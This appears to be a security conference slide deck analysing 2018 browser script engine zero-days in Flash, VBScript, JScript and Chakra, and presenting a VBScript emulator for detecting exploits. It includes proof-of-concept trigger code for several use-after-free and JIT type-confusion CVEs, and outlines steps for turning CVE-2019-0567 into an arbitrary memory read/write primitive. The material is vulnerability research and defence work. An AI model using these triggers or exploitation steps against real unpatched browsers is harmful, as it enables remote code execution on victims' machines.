Browser Script Engine Zero Days in 2018
Elliot Cao
Trend Micro
2019-05-30
Whoami
• Previously an electrical engineer
• Joined Trend Micro in 2017
• Sandbox developer
• Started browser vulnerability research in 2018
• Focus on browser script engine
• Lei Cao (@elli0tn0phacker)
Agenda
• Browser Zero Days in 2018
• VBSEmulator
• Chakra
Browser Zero Days in 2018
Browser Zero Days in 2018
• Flash: CVE-2018-4878 CVE-2018-15982
• VBScript: CVE-2018-8174 CVE-2018-8373
• JScript: CVE-2018-8653
Flash Zero Days in 2018
• CVE-2018-4878

var psdk:PSDK = PSDK.pSDK;
var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();
this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);
this.my_DRMListerner = new DRMOperationCompleteListener();      // Create an object
this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);
this.my_DRMListerner = null;                                    // Free the object
try {
    new LocalConnection().connect("foo");                       // Trigger GC
    new LocalConnection().connect("foo");
}
catch (e:Error) {
    my_DRMListerner_vuln = new DRMOperationCompleteListener();  // Reuse the freed memory: my_DRMListerner_vuln is a dangling pointer
}
Flash Zero Days in 2018
• CVE-2018-15982

var ba:ByteArray = new ByteArray();
var md:Metadata = new Metadata();
var arr_key:* = null;
i = 0;
while (i < 0x100) {
    md.setObject(i.toString(), ba);         // Create some String objects and save them to the Metadata
    i++;
}
try {
    new LocalConnection().connect("foo");   // Trigger GC
    new LocalConnection().connect("foo");
}
catch (e:Error) {}
arr_key = md.keySet;                        // Get dangling pointers (arr_key)
VBScript Zero Days in 2018
• CVE-2018-8174

Dim arr(1)
Dim o
Class MyClass
    Private Sub Class_Terminate
        Set o = arr(0)              ' Save the MyClass object pointer to variable o
        arr(0) = &h12345678
    End Sub
End Class
Set arr(0) = New MyClass            ' Create one MyClass object and save its pointer to arr(0)
Erase arr                           ' Releases arr(0), which runs Class_Terminate
msgbox o                            ' Get a dangling pointer
VBScript Zero Days in 2018
• CVE-2018-8373

Dim arr()
ReDim arr(2)
Class MyClass
    Public Default Property Get P
        ReDim arr(1)                ' The original array buffer will be freed by ReDim
    End Property
End Class
arr(2) = New MyClass                ' The arr(2) address is saved on the stack before the default property get runs: get a dangling pointer
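The CVE-2018-8174 and CVE-2018-8373 slides share one shape: the engine takes the address of an array element, then runs script-controlled code (Class_Terminate, a default property get) that frees or reallocates the array, and then uses the saved address. The C++ below is an added model written for this page, not vbscript.dll code; VarArray, Variant, the store functions and replay() are invented names, and ReDim is modelled as a fresh buffer replacing the old one. It replays the ReDim arr(2) / arr(2) = New MyClass script in the two possible evaluation orders and shows why "evaluate the right-hand side first, index last" is the ordering that survives a ReDim inside the getter.

```cpp
#include <cstddef>
#include <cstdint>
#include <functional>
#include <stdexcept>
#include <vector>

// A script value. A non-empty `getter` stands in for a Default Property Get:
// reading the value runs script, which is where the ReDim happens.
struct Variant {
    double number = 0.0;
    std::function<double()> getter;
};

// Toy equivalent of a VBScript dynamic array with ReDim (model, not the engine).
class VarArray {
public:
    explicit VarArray(std::size_t n) : buf_(n) {}

    // ReDim arr(n-1): a fresh buffer replaces the old one and the old buffer
    // is freed (the slides: "original array buffer will be freed by ReDim").
    void redim(std::size_t n) {
        std::vector<Variant> fresh(n);
        buf_.swap(fresh);          // the old buffer dies with `fresh` here
    }

    std::size_t size() const { return buf_.size(); }
    Variant& at(std::size_t i) { return buf_.at(i); }   // bounds-checked

    // Does `addr` lie inside the buffer that is live *now*? Compared as
    // integers, so a stale address can be tested without dereferencing it.
    bool owns(std::uintptr_t addr) const {
        auto base = reinterpret_cast<std::uintptr_t>(buf_.data());
        return addr >= base && addr < base + buf_.size() * sizeof(Variant);
    }

private:
    std::vector<Variant> buf_;
};

enum class StoreResult { Written, StaleSlot, OutOfRange };

// Evaluate the right-hand side; runs the property get if there is one.
static Variant evaluate(const Variant& rhs) {
    if (!rhs.getter) return rhs;
    Variant v;
    v.number = rhs.getter();
    return v;
}

// Vulnerable ordering (what the slides describe): the address of arr(idx) is
// saved first, the right-hand side is evaluated second, and the saved address
// is written last. If the evaluation ReDim'ed the array, the address is stale.
StoreResult store_capture_then_eval(VarArray& arr, std::size_t idx, const Variant& rhs) {
    auto slot = reinterpret_cast<std::uintptr_t>(&arr.at(idx));   // "saved on the stack"
    Variant value = evaluate(rhs);                                 // may ReDim arr
    if (!arr.owns(slot))
        return StoreResult::StaleSlot;   // the engine would write here: use-after-free
    *reinterpret_cast<Variant*>(slot) = value;
    return StoreResult::Written;
}

// Hardened ordering: evaluate first, index the array last, so the bounds
// check sees the post-ReDim size and a shrunk array is reported, not written.
StoreResult store_eval_then_index(VarArray& arr, std::size_t idx, const Variant& rhs) {
    Variant value = evaluate(rhs);
    try {
        arr.at(idx) = value;
    } catch (const std::out_of_range&) {
        return StoreResult::OutOfRange;  // arr(2) no longer exists after ReDim arr(1)
    }
    return StoreResult::Written;
}

// Replays the slide's script: ReDim arr(2), then arr(2) = New MyClass where
// MyClass's default property does ReDim arr(1). getter_redims=false is the
// benign case of a property get that leaves the array alone.
StoreResult replay(bool hardened, bool getter_redims) {
    VarArray arr(3);                      // ReDim arr(2): indices 0..2
    Variant my_class;
    my_class.getter = [&arr, getter_redims]() {
        if (getter_redims) arr.redim(2);  // ReDim arr(1): indices 0..1
        return 0.0;
    };
    return hardened ? store_eval_then_index(arr, 2, my_class)
                    : store_capture_then_eval(arr, 2, my_class);
}
```

With a benign getter both orderings write the element; with the ReDim'ing getter the capture-first ordering ends up holding an address outside the live buffer (StaleSlot, the point where the real engine writes into freed memory), while the evaluate-first ordering simply finds that index 2 no longer exists. The CVE-2018-8653 slides later in the deck are the same pattern with a stack-held `this` in place of the element address.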
JScript Zero Days in 2018
• CVE-2018-8653

…
for (var i = 0; i < limit; i++) {
    var arr = new Array({prototype:{}});    // Create an array containing an object that has a prototype object
    var e = new Enumerator(arr);
    e.moveFirst();
    refs[i] = e.item();
}
for (var i = 0; i < limit; i++) {
    refs[i].prototype = {};
    refs[i].prototype.isPrototypeOf = getFreeRef;   // Set the prototype object's isPrototypeOf to the |getFreeRef| callback
}
…
dummyObj instanceof refs[0];                // Trigger the |getFreeRef| callback

function getFreeRef() {
    if (count == limit) {
        …
        for (var i = 0; i < limit; i++) {
            refs[i].prototype = 0;          // Break out and release the prototype objects by garbage collection
        }
        CollectGarbage();
    } else {
        dummyObj instanceof refs[count++];  // Recursive calls put |this| on the stack
    }
    // crash here
    this;                                   // |this| is still saved on the stack and not tracked by GC: get a dangling pointer
    return false;
}
VBSEmulator
What is VBScript
• A scripting language developed by Microsoft
• Does not follow the ECMAScript standard
• Runs in vbscript.dll
• Not open source
How does vbscript.dll work
• Load
• Parse
• Compile
• Run
• Unload

CScriptRuntime::RunNoEH(CScriptRuntime *__hidden this, struct VAR *)

CScriptRuntime
+0x28 Local Variables
+0x2C Function Arguments
+0xB0 Stack Pointer
+0xB4 Position Counter
+0xC0 CompiledScript

CompiledScript
+0x10 func_offset
+0x14 func_count
+0x1C bos_info
+0x28 bos_data
+0x2C bos_data_length
What is VBSEmulator
• A tool that deobfuscates obfuscated VBS samples
• A tool that detects GodMode or ROP
How does VBSEmulator work
Flow: Start, Hook LoadLibrary, Init COM, Run Script, Dump Behavior, Detect Exploit (Y: Break out; N: continue), Uninitialize
• Functions hooked are not exported
• Need to maintain an entry-point pattern for each hooked function
• By hooking LoadLibrary, I can use a specialized vbscript.dll
• Exploit1: GodMode
• Exploit2: ROP
• Detect Exploit1: GodMode
(1) Hook COleScript::CanObjectRun
(2) Check whether the safe mode flag was modified
(3) If detected, throw an exception and stop running the ActiveX
• Detect Exploit2: ROP
(1) Hook ntdll!NtContinue
(2) Check whether CONTEXT.Eip == VirtualProtect
(3) If detected, throw an exception and stop running the shellcode
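The two detection rules above reduce to one comparison each; what a practitioner wants to see is where the baseline comes from and how the rules are applied to a stream of hook events until the first hit, which is where the emulator breaks out. The C++ below is an added model written for this page, not VBSEmulator's code: EmulatorChecks, check_trace_line and the trace-line format are invented, the safe-mode flag is treated as an opaque value compared with the snapshot taken before the script runs, and every address and flag value is a constructed placeholder.

```cpp
#include <cstdint>
#include <cstdlib>
#include <stdexcept>
#include <string>
#include <vector>

enum class Verdict { Clean, GodMode, Rop };

// Model of the two hooks. Field values are placeholders (see lead-in).
struct EmulatorChecks {
    std::uint32_t baseline_safe_mode;   // snapshot taken at init, before Run Script
    std::uint32_t virtual_protect;      // resolved address of VirtualProtect

    // Hook on COleScript::CanObjectRun: the flag differing from the snapshot
    // means the script modified it (GodMode); the emulator throws and stops the ActiveX.
    Verdict on_can_object_run(std::uint32_t safe_mode_now) const {
        return safe_mode_now == baseline_safe_mode ? Verdict::Clean : Verdict::GodMode;
    }
    // Hook on ntdll!NtContinue: CONTEXT.Eip == VirtualProtect is the ROP signal;
    // the emulator throws and stops the shellcode.
    Verdict on_nt_continue(std::uint32_t context_eip) const {
        return context_eip == virtual_protect ? Verdict::Rop : Verdict::Clean;
    }
};

// Parse one constructed hook-trace line, e.g.
//   "CanObjectRun safemode=0x0"   or   "NtContinue eip=0x7c801ad4"
// Unknown event kinds are Clean; a known kind with a missing value throws.
Verdict check_trace_line(const EmulatorChecks& c, const std::string& line) {
    auto value_after = [&](const std::string& key) -> std::uint32_t {
        auto pos = line.find(key + "=");
        if (pos == std::string::npos) throw std::invalid_argument("missing " + key);
        const char* start = line.c_str() + pos + key.size() + 1;
        return static_cast<std::uint32_t>(std::strtoul(start, nullptr, 16));
    };
    if (line.rfind("CanObjectRun", 0) == 0) return c.on_can_object_run(value_after("safemode"));
    if (line.rfind("NtContinue", 0) == 0)   return c.on_nt_continue(value_after("eip"));
    return Verdict::Clean;
}

// Walk the trace until the first detection: that is the "Y: Break out" edge
// of the flow on the slide.
Verdict scan_trace(const EmulatorChecks& c, const std::vector<std::string>& trace) {
    for (const auto& line : trace) {
        Verdict v = check_trace_line(c, line);
        if (v != Verdict::Clean) return v;
    }
    return Verdict::Clean;
}

// Constructed baseline: flag value and VirtualProtect address are placeholders.
const EmulatorChecks kChecks{0x0, 0x7c801ad4};

// Constructed sample traces (not real emulator output).
Verdict demo_godmode() {
    return scan_trace(kChecks, {
        "LoadLibrary vbscript.dll",
        "CanObjectRun safemode=0x0",     // unchanged since init
        "CanObjectRun safemode=0x4",     // flag no longer matches the snapshot
    });
}
Verdict demo_rop() {
    return scan_trace(kChecks, {
        "NtContinue eip=0x00401000",     // ordinary resume
        "NtContinue eip=0x7c801ad4",     // resumes at VirtualProtect
    });
}
Verdict demo_clean() {
    return scan_trace(kChecks, {"CanObjectRun safemode=0x0", "NtContinue eip=0x00401000"});
}
```

The snapshot-then-compare design is what makes the GodMode rule robust: the check needs no knowledge of what the flag's bits mean, only that script execution must not change it, which is the same property the slide's "check if safe mode flag modified" states.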
Demo
Chakra
What is Chakra
• A JavaScript engine developed by Microsoft
• Used in Microsoft Edge
• Forked from JScript9, which is used in Internet Explorer
• Open sourced as ChakraCore on GitHub ☺
How does Chakra work
• Parser
• Interpreter
• JIT compiler
• Garbage Collector
From: https://github.com/Microsoft/ChakraCore/wiki/Architecture-Overview
Basic variable type in Chakra
• Array
• JavascriptArray
• JavascriptNativeIntArray
• JavascriptNativeFloatArray
(figure: array segment layout)
• Type Conversion in Array
arr[0] = {};    // converts a JavascriptNativeFloatArray into a JavascriptArray
• Object
• Memory layout of DynamicObject
var obj2 = {__proto__:obj1};
Chakra JIT Type Confusion
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=chakra
![Page 54: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/54.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
    foo(obj);
}
for (let i = 0; i < 0x10000; i++) {
    opt(obj1);          // Force opt() to be JITed and optimized
}
opt(obj2);              // Call opt()'s JITed code directly
• The JITed opt() makes an assumption about obj's type and bails out if the type check fails
• foo() has a side effect that may change obj's type
• opt(obj2) runs the JITed code directly; if the JITed code does not check whether foo() changed obj2's type, type confusion happens
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];                                       // Define one JavascriptNativeFloatArray
function opt(f) {
    arr[0] = 1.1;
    arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));   // |replace| will trigger the ImplicitCall callback
    return 1;
}
for (var i = 0; i < 0x10000; i++)                           // The for loop forces opt() to be JITed and optimized
    opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});                         // Call opt()'s JITed code directly
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
![Page 64: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/64.jpg)
Chakra JIT Type Confusion
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
|replace| will trigger ImplicitCall callback
| arr[0]={}| will change the Array type from
JavascriptNativeFloatArray to JavascriptArray
• Case Study: CVE-2017-11802 : Root Cause
![Page 65: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/65.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
JITed opt() still assumes arr type is JavascriptNativeFloatArray.
Type confusion happened!
opt JITed Code
![Page 66: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/66.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
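The mechanism from the Example slide and this root cause, modelled as an added example (not Chakra's code and not from the talk): a toy array with the two kinds named above, a toy JITed opt() that trusts the kind it saw at compile time, and the same replace() callback changing the kind mid-store. The guarded flag is an assumed stand-in for re-checking the array kind after the implicit call.

```javascript
// Added teaching model, not Chakra's code: a toy array with the two kinds the
// slides name, a toy "JITed" opt() that cached the kind at compile time, and
// the implicit call (the replace() callback) that changes the kind under it.
const NATIVE_FLOAT = "JavascriptNativeFloatArray";
const GENERIC = "JavascriptArray";

class ToyArray {
  constructor(values) {
    this.kind = NATIVE_FLOAT;
    this.slots = values.slice();            // raw doubles while NATIVE_FLOAT
  }
  // Interpreter store: storing a non-number converts the array in place,
  // the transition that arr[0] = {} performs in the PoC.
  interpStore(i, v) {
    if (this.kind === NATIVE_FLOAT) {
      if (typeof v === "number") { this.slots[i] = v; return; }
      this.kind = GENERIC;
      this.slots = this.slots.map(d => ({ tag: "double", v: d })); // box doubles as Vars
    }
    this.slots[i] = typeof v === "number" ? { tag: "double", v } : v;
  }
  // JIT fast path compiled while the array was NATIVE_FLOAT: writes the raw double.
  jitStoreDouble(i, d) { this.slots[i] = d; }
  // Interpreter load: a GENERIC slot must hold a Var; a raw double there is the
  // confusion (the real engine would treat its bits as a pointer).
  interpLoad(i) {
    const s = this.slots[i];
    if (this.kind === NATIVE_FLOAT) return s;
    if (typeof s === "number") throw new Error("type confusion: raw double in Var slot");
    return s.tag === "double" ? s.v : s;
  }
}

// Toy JITed opt(): `guarded` (assumed name) models re-checking the array kind
// after the implicit call instead of trusting the kind cached at compile time.
function jitOpt(arr, f, guarded) {
  arr.jitStoreDouble(0, 1.1);
  // 2.3023e-320 is a denormal whose raw bits are the small integer 0x1234;
  // replace() runs f (the ImplicitCall) before the store to arr[1] happens.
  const rhs = 2.3023e-320 + parseInt("a".replace("a", f));
  if (guarded && arr.kind !== NATIVE_FLOAT) {
    arr.interpStore(1, rhs);                // bail out to the slow path
    return 1;
  }
  arr.jitStoreDouble(1, rhs);               // stale assumption: still raw doubles
  return 1;
}

// Runs the PoC sequence against the toy and reports whether arr[1] is readable.
function run(guarded) {
  const arr = new ToyArray([1.1, 1.2]);
  jitOpt(arr, () => "0", guarded);          // the warm-up call, already JITed here
  jitOpt(arr, () => { arr.interpStore(0, {}); return "0"; }, guarded);
  try {
    return { kind: arr.kind, value: arr.interpLoad(1), confused: false };
  } catch (e) {
    return { kind: arr.kind, value: null, confused: true, error: e.message };
  }
}

console.log(run(false));  // confused: true  (the CVE-2017-11802 behaviour)
console.log(run(true));   // confused: false (kind re-checked after the implicit call)
```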
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Patch
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567
    function opt(obj1, obj2) {
        obj1.b = 1;
        let tmp = {__proto__:obj2};
        obj1.a = 0x1234;
    }
    obj1 = {a:1, b:2 };
    obj2 = {};
    for(let i=0; i<0x10000; i++)
        opt(obj1, obj2);
    opt(obj1, obj1);
    //trigger exception
    obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
• Case Study: CVE-2019-0567 : Root Cause
• obj1 = {a:1, b:2 } and obj2 = {} create two objects.
• The for loop forces opt() to be JITed and optimized.
• During warm-up, {__proto__:obj2} makes obj2 the prototype of some object.
• The last call, opt(obj1, obj1), runs the JITed code directly.
• This time {__proto__:obj1} makes obj1 the prototype of some object, which changes obj1's memory layout.
• The JITed opt() does not know about the change of obj1's memory layout, so the following store obj1.a = 0x1234 uses the old layout. Type confusion happened!
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Patch
• Before patch: lowerer
• After patch: lowerer
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• auxSlots can be controlled by script
• The goal is to get an arbitrary R/W primitive
• Some object needs to be corrupted to get there
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• DataView
    var buffer = new ArrayBuffer(0x123);
    var dv = new DataView(buffer);
    dv.setUint32(0, 0x12345678, true);
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
[Diagram: four objects side by side. obj1 (DynamicObject) and obj3 (DynamicObject) each consist of the fields vtable, type, auxslots, objectArray; dv1 (DataView) and dv2 (DataView) each consist of vtable, type, auxslots, objectArray, length, arrayBuffer, byteOffset, buffer. obj1's auxSlots hold obj1.a, obj1.b, obj1.c; obj3's auxSlots hold obj3.a through obj3.h. Once obj1->auxSlots points at obj3, obj1.a, obj1.b and obj1.c alias obj3's vtable, type and auxslots; once obj3->auxSlots points at dv1, obj3.a through obj3.h alias dv1's eight fields, so obj3.h is dv1->buffer.]
Step1. Trigger bug and set obj1->auxSlots = obj3
    opt(obj1, obj1, obj3);
Step2. Set obj3->auxSlots = dv1
    obj1.c = dv1;
Step3. Set dv1->buffer = dv2
    obj3.h = dv2;
Step4. Get arbitrary R/W primitive by corrupting dv2's buffer
    dv1.setUint32(0x38, addr_lo, true);
    dv1.setUint32(0x3c, addr_hi, true);
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Leak chakra base address
Demo
Conclusion
• Flash is still the main target of attackers. As Adobe will stop updating Flash at the end of 2020, the number of Flash zero-day attacks may decrease.
• In 2018, some old script engines, such as VBScript and JScript, began to be targeted by attackers. More zero-day attacks may be discovered in these script engines in the future.
• VBSEmulator is one tool that can be used for VBScript deobfuscation and to detect possible unknown exploits.
• The new JavaScript engine Chakra seems vulnerable, especially its JIT compiler. Type confusion is easy to exploit.
Thank You!